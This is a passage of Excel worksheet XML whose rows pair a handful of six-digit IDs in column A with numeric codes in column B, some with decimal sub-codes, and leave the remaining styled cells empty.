    <row r="5178" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5178" s="5">
        <v>700583</v>
      </c>
      <c r="B5178" s="3">
        <v>901046</v>
      </c>
      <c r="D5178" s="5"/>
      <c r="E5178" s="3"/>
      <c r="F5178" s="1"/>
      <c r="H5178" s="1"/>
    </row>
    <row r="5179" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5179" s="5">
        <v>700583</v>
      </c>
      <c r="B5179" s="3">
        <v>901003.00100000005</v>
      </c>
      <c r="D5179" s="5"/>
      <c r="E5179" s="3"/>
      <c r="F5179" s="1"/>
      <c r="H5179" s="1"/>
    </row>
    <row r="5180" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5180" s="5">
        <v>700583</v>
      </c>
      <c r="B5180" s="3">
        <v>901021.00100000005</v>
      </c>
      <c r="D5180" s="5"/>
      <c r="E5180" s="3"/>
      <c r="F5180" s="1"/>
      <c r="H5180" s="1"/>
    </row>
    <row r="5181" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5181" s="5">
        <v>700583</v>
      </c>
      <c r="B5181" s="3">
        <v>901489</v>
      </c>
      <c r="D5181" s="5"/>
      <c r="E5181" s="3"/>
      <c r="F5181" s="1"/>
      <c r="H5181" s="1"/>
    </row>
    <row r="5182" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5182" s="5">
        <v>700583</v>
      </c>
      <c r="B5182" s="3">
        <v>901016</v>
      </c>
      <c r="D5182" s="5"/>
      <c r="E5182" s="3"/>
      <c r="F5182" s="1"/>
      <c r="H5182" s="1"/>
    </row>
    <row r="5183" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5183" s="5">
        <v>700583</v>
      </c>
      <c r="B5183" s="3">
        <v>901569.00199999998</v>
      </c>
      <c r="D5183" s="5"/>
      <c r="E5183" s="3"/>
      <c r="F5183" s="1"/>
      <c r="H5183" s="1"/>
    </row>
    <row r="5184" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5184" s="5">
        <v>700583</v>
      </c>
      <c r="B5184" s="3">
        <v>901552.00100000005</v>
      </c>
      <c r="D5184" s="5"/>
      <c r="E5184" s="3"/>
      <c r="F5184" s="1"/>
      <c r="H5184" s="1"/>
    </row>
    <row r="5185" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5185" s="5">
        <v>700650</v>
      </c>
      <c r="B5185" s="3">
        <v>901071.00100000005</v>
      </c>
      <c r="D5185" s="5"/>
      <c r="E5185" s="3"/>
      <c r="F5185" s="1"/>
      <c r="H5185" s="1"/>
    </row>
    <row r="5186" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5186" s="5">
        <v>700650</v>
      </c>
      <c r="B5186" s="3">
        <v>901010</v>
      </c>
      <c r="D5186" s="5"/>
      <c r="E5186" s="3"/>
      <c r="F5186" s="1"/>
      <c r="H5186" s="1"/>
    </row>
    <row r="5187" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5187" s="5">
        <v>700650</v>
      </c>
      <c r="B5187" s="3">
        <v>901547.00100000005</v>
      </c>
      <c r="D5187" s="5"/>
      <c r="E5187" s="3"/>
      <c r="F5187" s="1"/>
      <c r="H5187" s="1"/>
    </row>
    <row r="5188" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5188" s="5">
        <v>700650</v>
      </c>
      <c r="B5188" s="3">
        <v>901185</v>
      </c>
      <c r="D5188" s="5"/>
      <c r="E5188" s="3"/>
      <c r="F5188" s="1"/>
      <c r="H5188" s="1"/>
    </row>
    <row r="5189" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5189" s="5">
        <v>700650</v>
      </c>
      <c r="B5189" s="3">
        <v>901110</v>
      </c>
      <c r="D5189" s="5"/>
      <c r="E5189" s="3"/>
      <c r="F5189" s="1"/>
      <c r="H5189" s="1"/>
    </row>
    <row r="5190" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5190" s="5">
        <v>700650</v>
      </c>
      <c r="B5190" s="3">
        <v>901059.00100000005</v>
      </c>
      <c r="D5190" s="5"/>
      <c r="E5190" s="3"/>
      <c r="F5190" s="1"/>
      <c r="H5190" s="1"/>
    </row>
    <row r="5191" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5191" s="5">
        <v>700650</v>
      </c>
      <c r="B5191" s="3">
        <v>901059.00300000003</v>
      </c>
      <c r="D5191" s="5"/>
      <c r="E5191" s="3"/>
      <c r="F5191" s="1"/>
      <c r="H5191" s="1"/>
    </row>
    <row r="5192" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5192" s="5">
        <v>700650</v>
      </c>
      <c r="B5192" s="3">
        <v>901059.005</v>
      </c>
      <c r="D5192" s="5"/>
      <c r="E5192" s="3"/>
      <c r="F5192" s="1"/>
      <c r="H5192" s="1"/>
    </row>
    <row r="5193" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5193" s="5">
        <v>700650</v>
      </c>
      <c r="B5193" s="3">
        <v>901059.00699999998</v>
      </c>
      <c r="D5193" s="5"/>
      <c r="E5193" s="3"/>
      <c r="F5193" s="1"/>
      <c r="H5193" s="1"/>
    </row>
    <row r="5194" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5194" s="5">
        <v>700650</v>
      </c>
      <c r="B5194" s="3">
        <v>901555.00300000003</v>
      </c>
      <c r="D5194" s="5"/>
      <c r="E5194" s="3"/>
      <c r="F5194" s="1"/>
      <c r="H5194" s="1"/>
    </row>
    <row r="5195" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5195" s="5">
        <v>700650</v>
      </c>
      <c r="B5195" s="3">
        <v>901132.00100000005</v>
      </c>
      <c r="D5195" s="5"/>
      <c r="E5195" s="3"/>
      <c r="F5195" s="1"/>
      <c r="H5195" s="1"/>
    </row>
    <row r="5196" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5196" s="5">
        <v>700650</v>
      </c>
      <c r="B5196" s="3">
        <v>901005</v>
      </c>
      <c r="D5196" s="5"/>
      <c r="E5196" s="3"/>
      <c r="F5196" s="1"/>
      <c r="H5196" s="1"/>
    </row>
    <row r="5197" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5197" s="5">
        <v>700650</v>
      </c>
      <c r="B5197" s="3">
        <v>901074.00100000005</v>
      </c>
      <c r="D5197" s="5"/>
      <c r="E5197" s="3"/>
      <c r="F5197" s="1"/>
      <c r="H5197" s="1"/>
    </row>
    <row r="5198" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5198" s="5">
        <v>700650</v>
      </c>
      <c r="B5198" s="3">
        <v>901140</v>
      </c>
      <c r="D5198" s="5"/>
      <c r="E5198" s="3"/>
      <c r="F5198" s="1"/>
      <c r="H5198" s="1"/>
    </row>
    <row r="5199" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5199" s="5">
        <v>700650</v>
      </c>
      <c r="B5199" s="3">
        <v>901482</v>
      </c>
      <c r="D5199" s="5"/>
      <c r="E5199" s="3"/>
      <c r="F5199" s="1"/>
      <c r="H5199" s="1"/>
    </row>
    <row r="5200" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5200" s="5">
        <v>700650</v>
      </c>
      <c r="B5200" s="3">
        <v>901568.00199999998</v>
      </c>
      <c r="D5200" s="5"/>
      <c r="E5200" s="3"/>
      <c r="F5200" s="1"/>
      <c r="H5200" s="1"/>
    </row>
    <row r="5201" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5201" s="5">
        <v>700650</v>
      </c>
      <c r="B5201" s="3">
        <v>901114.00100000005</v>
      </c>
      <c r="D5201" s="5"/>
      <c r="E5201" s="3"/>
      <c r="F5201" s="1"/>
      <c r="H5201" s="1"/>
    </row>
    <row r="5202" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5202" s="5">
        <v>700650</v>
      </c>
      <c r="B5202" s="3">
        <v>901573.00100000005</v>
      </c>
      <c r="D5202" s="5"/>
      <c r="E5202" s="3"/>
      <c r="F5202" s="1"/>
      <c r="H5202" s="1"/>
    </row>
    <row r="5203" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5203" s="5">
        <v>700650</v>
      </c>
      <c r="B5203" s="3">
        <v>901041</v>
      </c>
      <c r="D5203" s="5"/>
      <c r="E5203" s="3"/>
      <c r="F5203" s="1"/>
      <c r="H5203" s="1"/>
    </row>
    <row r="5204" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5204" s="5">
        <v>700650</v>
      </c>
      <c r="B5204" s="3">
        <v>901210</v>
      </c>
      <c r="D5204" s="5"/>
      <c r="E5204" s="3"/>
      <c r="F5204" s="1"/>
      <c r="H5204" s="1"/>
    </row>
    <row r="5205" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5205" s="5">
        <v>700650</v>
      </c>
      <c r="B5205" s="3">
        <v>901083</v>
      </c>
      <c r="D5205" s="5"/>
      <c r="E5205" s="3"/>
      <c r="F5205" s="1"/>
      <c r="H5205" s="1"/>
    </row>
    <row r="5206" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5206" s="5">
        <v>700650</v>
      </c>
      <c r="B5206" s="3">
        <v>901562.00100000005</v>
      </c>
      <c r="D5206" s="5"/>
      <c r="E5206" s="3"/>
      <c r="F5206" s="1"/>
      <c r="H5206" s="1"/>
    </row>
    <row r="5207" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5207" s="5">
        <v>700650</v>
      </c>
      <c r="B5207" s="3">
        <v>901070.00399999996</v>
      </c>
      <c r="D5207" s="5"/>
      <c r="E5207" s="3"/>
      <c r="F5207" s="1"/>
      <c r="H5207" s="1"/>
    </row>
    <row r="5208" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5208" s="5">
        <v>700650</v>
      </c>
      <c r="B5208" s="3">
        <v>901105</v>
      </c>
      <c r="D5208" s="5"/>
      <c r="E5208" s="3"/>
      <c r="F5208" s="1"/>
      <c r="H5208" s="1"/>
    </row>
    <row r="5209" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5209" s="5">
        <v>700650</v>
      </c>
      <c r="B5209" s="3">
        <v>901056.00100000005</v>
      </c>
      <c r="D5209" s="5"/>
      <c r="E5209" s="3"/>
      <c r="F5209" s="1"/>
      <c r="H5209" s="1"/>
    </row>
    <row r="5210" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5210" s="5">
        <v>700650</v>
      </c>
      <c r="B5210" s="3">
        <v>901036</v>
      </c>
      <c r="D5210" s="5"/>
      <c r="E5210" s="3"/>
      <c r="F5210" s="1"/>
      <c r="H5210" s="1"/>
    </row>
    <row r="5211" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5211" s="5">
        <v>700650</v>
      </c>
      <c r="B5211" s="3">
        <v>901112</v>
      </c>
      <c r="D5211" s="5"/>
      <c r="E5211" s="3"/>
      <c r="F5211" s="1"/>
      <c r="H5211" s="1"/>
    </row>
    <row r="5212" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5212" s="5">
        <v>700650</v>
      </c>
      <c r="B5212" s="3">
        <v>901106</v>
      </c>
      <c r="D5212" s="5"/>
      <c r="E5212" s="3"/>
      <c r="F5212" s="1"/>
      <c r="H5212" s="1"/>
    </row>
    <row r="5213" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5213" s="5">
        <v>700650</v>
      </c>
      <c r="B5213" s="3">
        <v>901135</v>
      </c>
      <c r="D5213" s="5"/>
      <c r="E5213" s="3"/>
      <c r="F5213" s="1"/>
      <c r="H5213" s="1"/>
    </row>
    <row r="5214" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5214" s="5">
        <v>700650</v>
      </c>
      <c r="B5214" s="3">
        <v>901095</v>
      </c>
      <c r="D5214" s="5"/>
      <c r="E5214" s="3"/>
      <c r="F5214" s="1"/>
      <c r="H5214" s="1"/>
    </row>
    <row r="5215" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5215" s="5">
        <v>700650</v>
      </c>
      <c r="B5215" s="3">
        <v>901027</v>
      </c>
      <c r="D5215" s="5"/>
      <c r="E5215" s="3"/>
      <c r="F5215" s="1"/>
      <c r="H5215" s="1"/>
    </row>
    <row r="5216" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5216" s="5">
        <v>700650</v>
      </c>
      <c r="B5216" s="3">
        <v>901027.00100000005</v>
      </c>
      <c r="D5216" s="5"/>
      <c r="E5216" s="3"/>
      <c r="F5216" s="1"/>
      <c r="H5216" s="1"/>
    </row>
    <row r="5217" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5217" s="5">
        <v>700650</v>
      </c>
      <c r="B5217" s="3">
        <v>901027.00199999998</v>
      </c>
      <c r="D5217" s="5"/>
      <c r="E5217" s="3"/>
      <c r="F5217" s="1"/>
      <c r="H5217" s="1"/>
    </row>
    <row r="5218" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5218" s="5">
        <v>700650</v>
      </c>
      <c r="B5218" s="3">
        <v>901027.005</v>
      </c>
      <c r="D5218" s="5"/>
      <c r="E5218" s="3"/>
      <c r="F5218" s="1"/>
      <c r="H5218" s="1"/>
    </row>
    <row r="5219" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5219" s="5">
        <v>700650</v>
      </c>
      <c r="B5219" s="3">
        <v>901120</v>
      </c>
      <c r="D5219" s="5"/>
      <c r="E5219" s="3"/>
      <c r="F5219" s="1"/>
      <c r="H5219" s="1"/>
    </row>
    <row r="5220" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5220" s="5">
        <v>700650</v>
      </c>
      <c r="B5220" s="3">
        <v>901069.00100000005</v>
      </c>
      <c r="D5220" s="5"/>
      <c r="E5220" s="3"/>
      <c r="F5220" s="1"/>
      <c r="H5220" s="1"/>
    </row>
    <row r="5221" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5221" s="5">
        <v>700650</v>
      </c>
      <c r="B5221" s="3">
        <v>901566.00100000005</v>
      </c>
      <c r="D5221" s="5"/>
      <c r="E5221" s="3"/>
      <c r="F5221" s="1"/>
      <c r="H5221" s="1"/>
    </row>
    <row r="5222" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5222" s="5">
        <v>700650</v>
      </c>
      <c r="B5222" s="3">
        <v>901566.00199999998</v>
      </c>
      <c r="D5222" s="5"/>
      <c r="E5222" s="3"/>
      <c r="F5222" s="1"/>
      <c r="H5222" s="1"/>
    </row>
    <row r="5223" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5223" s="5">
        <v>700650</v>
      </c>
      <c r="B5223" s="3">
        <v>901057</v>
      </c>
      <c r="D5223" s="5"/>
      <c r="E5223" s="3"/>
      <c r="F5223" s="1"/>
      <c r="H5223" s="1"/>
    </row>
    <row r="5224" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5224" s="5">
        <v>700650</v>
      </c>
      <c r="B5224" s="3">
        <v>901055</v>
      </c>
      <c r="D5224" s="5"/>
      <c r="E5224" s="3"/>
      <c r="F5224" s="1"/>
      <c r="H5224" s="1"/>
    </row>
    <row r="5225" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5225" s="5">
        <v>700650</v>
      </c>
      <c r="B5225" s="3">
        <v>901055.01199999999</v>
      </c>
      <c r="D5225" s="5"/>
      <c r="E5225" s="3"/>
      <c r="F5225" s="1"/>
      <c r="H5225" s="1"/>
    </row>
    <row r="5226" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5226" s="5">
        <v>700650</v>
      </c>
      <c r="B5226" s="3">
        <v>901572</v>
      </c>
      <c r="D5226" s="5"/>
      <c r="E5226" s="3"/>
      <c r="F5226" s="1"/>
      <c r="H5226" s="1"/>
    </row>
    <row r="5227" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5227" s="5">
        <v>700650</v>
      </c>
      <c r="B5227" s="3">
        <v>901090.00199999998</v>
      </c>
      <c r="D5227" s="5"/>
      <c r="E5227" s="3"/>
      <c r="F5227" s="1"/>
      <c r="H5227" s="1"/>
    </row>
    <row r="5228" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5228" s="5">
        <v>700650</v>
      </c>
      <c r="B5228" s="3">
        <v>901018</v>
      </c>
      <c r="D5228" s="5"/>
      <c r="E5228" s="3"/>
      <c r="F5228" s="1"/>
      <c r="H5228" s="1"/>
    </row>
    <row r="5229" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5229" s="5">
        <v>700650</v>
      </c>
      <c r="B5229" s="3">
        <v>901091</v>
      </c>
      <c r="D5229" s="5"/>
      <c r="E5229" s="3"/>
      <c r="F5229" s="1"/>
      <c r="H5229" s="1"/>
    </row>
    <row r="5230" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5230" s="5">
        <v>700650</v>
      </c>
      <c r="B5230" s="3">
        <v>901053.005</v>
      </c>
      <c r="D5230" s="5"/>
      <c r="E5230" s="3"/>
      <c r="F5230" s="1"/>
      <c r="H5230" s="1"/>
    </row>
    <row r="5231" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5231" s="5">
        <v>700650</v>
      </c>
      <c r="B5231" s="3">
        <v>901218.00699999998</v>
      </c>
      <c r="D5231" s="5"/>
      <c r="E5231" s="3"/>
      <c r="F5231" s="1"/>
      <c r="H5231" s="1"/>
    </row>
    <row r="5232" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5232" s="5">
        <v>700650</v>
      </c>
      <c r="B5232" s="3">
        <v>901218.01</v>
      </c>
      <c r="D5232" s="5"/>
      <c r="E5232" s="3"/>
      <c r="F5232" s="1"/>
      <c r="H5232" s="1"/>
    </row>
    <row r="5233" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5233" s="5">
        <v>700650</v>
      </c>
      <c r="B5233" s="3">
        <v>901218.01100000006</v>
      </c>
      <c r="D5233" s="5"/>
      <c r="E5233" s="3"/>
      <c r="F5233" s="1"/>
      <c r="H5233" s="1"/>
    </row>
    <row r="5234" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5234" s="5">
        <v>700650</v>
      </c>
      <c r="B5234" s="3">
        <v>901518</v>
      </c>
      <c r="D5234" s="5"/>
      <c r="E5234" s="3"/>
      <c r="F5234" s="1"/>
      <c r="H5234" s="1"/>
    </row>
    <row r="5235" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5235" s="5">
        <v>700650</v>
      </c>
      <c r="B5235" s="3">
        <v>901518.00100000005</v>
      </c>
      <c r="D5235" s="5"/>
      <c r="E5235" s="3"/>
      <c r="F5235" s="1"/>
      <c r="H5235" s="1"/>
    </row>
    <row r="5236" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5236" s="5">
        <v>700650</v>
      </c>
      <c r="B5236" s="3">
        <v>901539</v>
      </c>
      <c r="D5236" s="5"/>
      <c r="E5236" s="3"/>
      <c r="F5236" s="1"/>
      <c r="H5236" s="1"/>
    </row>
    <row r="5237" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5237" s="5">
        <v>700650</v>
      </c>
      <c r="B5237" s="3">
        <v>901553.00199999998</v>
      </c>
      <c r="D5237" s="5"/>
      <c r="E5237" s="3"/>
      <c r="F5237" s="1"/>
      <c r="H5237" s="1"/>
    </row>
    <row r="5238" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5238" s="5">
        <v>700650</v>
      </c>
      <c r="B5238" s="3">
        <v>901082</v>
      </c>
      <c r="D5238" s="5"/>
      <c r="E5238" s="3"/>
      <c r="F5238" s="1"/>
      <c r="H5238" s="1"/>
    </row>
    <row r="5239" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5239" s="5">
        <v>700650</v>
      </c>
      <c r="B5239" s="3">
        <v>901016</v>
      </c>
      <c r="D5239" s="5"/>
      <c r="E5239" s="3"/>
      <c r="F5239" s="1"/>
      <c r="H5239" s="1"/>
    </row>
    <row r="5240" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5240" s="5">
        <v>700650</v>
      </c>
      <c r="B5240" s="3">
        <v>901016.00100000005</v>
      </c>
      <c r="D5240" s="5"/>
      <c r="E5240" s="3"/>
      <c r="F5240" s="1"/>
      <c r="H5240" s="1"/>
    </row>
    <row r="5241" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5241" s="5">
        <v>700650</v>
      </c>
      <c r="B5241" s="3">
        <v>901049</v>
      </c>
      <c r="D5241" s="5"/>
      <c r="E5241" s="3"/>
      <c r="F5241" s="1"/>
      <c r="H5241" s="1"/>
    </row>
    <row r="5242" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5242" s="5">
        <v>700650</v>
      </c>
      <c r="B5242" s="3">
        <v>901033</v>
      </c>
      <c r="D5242" s="5"/>
      <c r="E5242" s="3"/>
      <c r="F5242" s="1"/>
      <c r="H5242" s="1"/>
    </row>
    <row r="5243" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5243" s="5">
        <v>700650</v>
      </c>
      <c r="B5243" s="3">
        <v>901124</v>
      </c>
      <c r="D5243" s="5"/>
      <c r="E5243" s="3"/>
      <c r="F5243" s="1"/>
      <c r="H5243" s="1"/>
    </row>
    <row r="5244" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5244" s="5">
        <v>700650</v>
      </c>
      <c r="B5244" s="3">
        <v>901204.00100000005</v>
      </c>
      <c r="D5244" s="5"/>
      <c r="E5244" s="3"/>
      <c r="F5244" s="1"/>
      <c r="H5244" s="1"/>
    </row>
    <row r="5245" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5245" s="5">
        <v>700650</v>
      </c>
      <c r="B5245" s="3">
        <v>901204.00199999998</v>
      </c>
      <c r="D5245" s="5"/>
      <c r="E5245" s="3"/>
      <c r="F5245" s="1"/>
      <c r="H5245" s="1"/>
    </row>
    <row r="5246" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5246" s="5">
        <v>700650</v>
      </c>
      <c r="B5246" s="3">
        <v>901497.00100000005</v>
      </c>
      <c r="D5246" s="5"/>
      <c r="E5246" s="3"/>
      <c r="F5246" s="1"/>
      <c r="H5246" s="1"/>
    </row>
    <row r="5247" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5247" s="5">
        <v>700650</v>
      </c>
      <c r="B5247" s="3">
        <v>901497.00300000003</v>
      </c>
      <c r="D5247" s="5"/>
      <c r="E5247" s="3"/>
      <c r="F5247" s="1"/>
      <c r="H5247" s="1"/>
    </row>
    <row r="5248" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5248" s="5">
        <v>700650</v>
      </c>
      <c r="B5248" s="3">
        <v>901047</v>
      </c>
      <c r="D5248" s="5"/>
      <c r="E5248" s="3"/>
      <c r="F5248" s="1"/>
      <c r="H5248" s="1"/>
    </row>
    <row r="5249" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5249" s="5">
        <v>700269</v>
      </c>
      <c r="B5249" s="3">
        <v>901071.00100000005</v>
      </c>
      <c r="D5249" s="5"/>
      <c r="E5249" s="3"/>
      <c r="F5249" s="1"/>
      <c r="H5249" s="1"/>
    </row>
    <row r="5250" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5250" s="5">
        <v>700269</v>
      </c>
      <c r="B5250" s="3">
        <v>901071.00399999996</v>
      </c>
      <c r="D5250" s="5"/>
      <c r="E5250" s="3"/>
      <c r="F5250" s="1"/>
      <c r="H5250" s="1"/>
    </row>
    <row r="5251" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5251" s="5">
        <v>700269</v>
      </c>
      <c r="B5251" s="3">
        <v>901059.00100000005</v>
      </c>
      <c r="D5251" s="5"/>
      <c r="E5251" s="3"/>
      <c r="F5251" s="1"/>
      <c r="H5251" s="1"/>
    </row>
    <row r="5252" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5252" s="5">
        <v>700269</v>
      </c>
      <c r="B5252" s="3">
        <v>901059.00300000003</v>
      </c>
      <c r="D5252" s="5"/>
      <c r="E5252" s="3"/>
      <c r="F5252" s="1"/>
      <c r="H5252" s="1"/>
    </row>
    <row r="5253" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5253" s="5">
        <v>700269</v>
      </c>
      <c r="B5253" s="3">
        <v>901059.005</v>
      </c>
      <c r="D5253" s="5"/>
      <c r="E5253" s="3"/>
      <c r="F5253" s="1"/>
      <c r="H5253" s="1"/>
    </row>
    <row r="5254" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5254" s="5">
        <v>700269</v>
      </c>
      <c r="B5254" s="3">
        <v>901132.00100000005</v>
      </c>
      <c r="D5254" s="5"/>
      <c r="E5254" s="3"/>
      <c r="F5254" s="1"/>
      <c r="H5254" s="1"/>
    </row>
    <row r="5255" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5255" s="5">
        <v>700269</v>
      </c>
      <c r="B5255" s="3">
        <v>901140</v>
      </c>
      <c r="D5255" s="5"/>
      <c r="E5255" s="3"/>
      <c r="F5255" s="1"/>
      <c r="H5255" s="1"/>
    </row>
    <row r="5256" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5256" s="5">
        <v>700269</v>
      </c>
      <c r="B5256" s="3">
        <v>901008</v>
      </c>
      <c r="D5256" s="5"/>
      <c r="E5256" s="3"/>
      <c r="F5256" s="1"/>
      <c r="H5256" s="1"/>
    </row>
    <row r="5257" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5257" s="5">
        <v>700269</v>
      </c>
      <c r="B5257" s="3">
        <v>901070.00399999996</v>
      </c>
      <c r="D5257" s="5"/>
      <c r="E5257" s="3"/>
      <c r="F5257" s="1"/>
      <c r="H5257" s="1"/>
    </row>
    <row r="5258" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5258" s="5">
        <v>700269</v>
      </c>
      <c r="B5258" s="3">
        <v>901036.005</v>
      </c>
      <c r="D5258" s="5"/>
      <c r="E5258" s="3"/>
      <c r="F5258" s="1"/>
      <c r="H5258" s="1"/>
    </row>
    <row r="5259" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5259" s="5">
        <v>700269</v>
      </c>
      <c r="B5259" s="3">
        <v>901112</v>
      </c>
      <c r="D5259" s="5"/>
      <c r="E5259" s="3"/>
      <c r="F5259" s="1"/>
      <c r="H5259" s="1"/>
    </row>
    <row r="5260" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5260" s="5">
        <v>700269</v>
      </c>
      <c r="B5260" s="3">
        <v>901027</v>
      </c>
      <c r="D5260" s="5"/>
      <c r="E5260" s="3"/>
      <c r="F5260" s="1"/>
      <c r="H5260" s="1"/>
    </row>
    <row r="5261" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5261" s="5">
        <v>700269</v>
      </c>
      <c r="B5261" s="3">
        <v>901012</v>
      </c>
      <c r="D5261" s="5"/>
      <c r="E5261" s="3"/>
      <c r="F5261" s="1"/>
      <c r="H5261" s="1"/>
    </row>
    <row r="5262" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5262" s="5">
        <v>700269</v>
      </c>
      <c r="B5262" s="3">
        <v>901053.005</v>
      </c>
      <c r="D5262" s="5"/>
      <c r="E5262" s="3"/>
      <c r="F5262" s="1"/>
      <c r="H5262" s="1"/>
    </row>
    <row r="5263" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5263" s="5">
        <v>700269</v>
      </c>
      <c r="B5263" s="3">
        <v>901016</v>
      </c>
      <c r="D5263" s="5"/>
      <c r="E5263" s="3"/>
      <c r="F5263" s="1"/>
      <c r="H5263" s="1"/>
    </row>
    <row r="5264" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5264" s="5">
        <v>700269</v>
      </c>
      <c r="B5264" s="3">
        <v>901033</v>
      </c>
      <c r="D5264" s="5"/>
      <c r="E5264" s="3"/>
      <c r="F5264" s="1"/>
      <c r="H5264" s="1"/>
    </row>
    <row r="5265" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5265" s="5">
        <v>700262</v>
      </c>
      <c r="B5265" s="3">
        <v>901059.00300000003</v>
      </c>
      <c r="D5265" s="5"/>
      <c r="E5265" s="3"/>
      <c r="F5265" s="1"/>
      <c r="H5265" s="1"/>
    </row>
    <row r="5266" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5266" s="5">
        <v>700262</v>
      </c>
      <c r="B5266" s="3">
        <v>901555</v>
      </c>
      <c r="D5266" s="5"/>
      <c r="E5266" s="3"/>
      <c r="F5266" s="1"/>
      <c r="H5266" s="1"/>
    </row>
    <row r="5267" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5267" s="5">
        <v>700262</v>
      </c>
      <c r="B5267" s="3">
        <v>901555.00300000003</v>
      </c>
      <c r="D5267" s="5"/>
      <c r="E5267" s="3"/>
      <c r="F5267" s="1"/>
      <c r="H5267" s="1"/>
    </row>
    <row r="5268" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5268" s="5">
        <v>700262</v>
      </c>
      <c r="B5268" s="3">
        <v>901573.00100000005</v>
      </c>
      <c r="D5268" s="5"/>
      <c r="E5268" s="3"/>
      <c r="F5268" s="1"/>
      <c r="H5268" s="1"/>
    </row>
    <row r="5269" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5269" s="5">
        <v>700262</v>
      </c>
      <c r="B5269" s="3">
        <v>901105</v>
      </c>
      <c r="D5269" s="5"/>
      <c r="E5269" s="3"/>
      <c r="F5269" s="1"/>
      <c r="H5269" s="1"/>
    </row>
    <row r="5270" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5270" s="5">
        <v>700262</v>
      </c>
      <c r="B5270" s="3">
        <v>901056.00100000005</v>
      </c>
      <c r="D5270" s="5"/>
      <c r="E5270" s="3"/>
      <c r="F5270" s="1"/>
      <c r="H5270" s="1"/>
    </row>
    <row r="5271" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5271" s="5">
        <v>700262</v>
      </c>
